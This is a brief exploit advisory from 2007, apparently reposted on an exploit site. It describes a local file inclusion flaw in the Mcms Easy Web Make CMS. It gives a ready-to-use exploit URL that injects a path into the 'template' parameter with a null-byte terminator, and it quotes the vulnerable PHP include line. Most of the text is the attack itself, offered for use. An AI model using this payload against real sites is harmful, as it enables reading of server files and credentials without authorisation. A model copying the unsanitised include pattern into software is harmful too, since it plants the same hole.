id: 2355
date: 12/11/2007
title: Mcms Easy Web Make (index.php template) Local File Inclusion Vuln
author: MhZ91
cves: 

=================================================================
Mcms Easy Web Make (index.php template) Local File Inclusion Vuln
=================================================================



---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          

---------------------------------------------------------------
  Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Mcms Easy Web Make - Local File Inclusion
# Download: http://sourceforge.net/projects/easywebmake/
# Bug: Local File Inclusion
---------------------------------------------------------------
Only If magic_quotes_gpc is Off
Exploit: http://[site]/modules/cms/index.php?template=[LFI]%00
Vuln Code: include"includes/$template/template.config.php";
---------------------------------------------------------------



#  0day.today [2023-03-24]  #